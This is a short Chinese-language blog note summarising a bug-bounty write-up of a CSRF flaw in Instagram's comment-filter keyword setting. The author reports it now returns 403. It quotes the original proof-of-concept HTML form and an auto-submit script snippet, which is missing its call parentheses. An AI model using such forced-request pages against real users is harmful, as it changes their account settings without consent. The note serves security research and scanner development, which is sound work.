链接：https://medium.com/@mohamedajimi59/csrf-in-instagram-461cbba286a

登录了IG，然后里面有个屏蔽词的设置，我设置了一个pxiaoer，然后抓包看了一下请求

这个请求头主要是为了判断，请求是否来自于账户所有者。 就是防止CSRF的。

作者删除这个头之后，也成功了，我们现在来试试，发现已经403了，

说明现在已经检查了csrf_token了。

作者写了个利用的方法：

<html>
<head>
<title>exploit csrf</title>
</head>
<body>
<form action="https://www.instagram.com/accounts/set_comment_filter_keywords_web/" method="POST">
<input type="hidden" name="keywords" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
You can also include auto submit script
<script>
document.forms[0].submit
</script>

提给Facebook，奖金25000刀。

我的想法

这个洞的逻辑非常简单，就是删掉一个header，然后看是否可以。 也是可以自动化做的，这洞运气爆了。

那如果才能加到扫描器里面呢？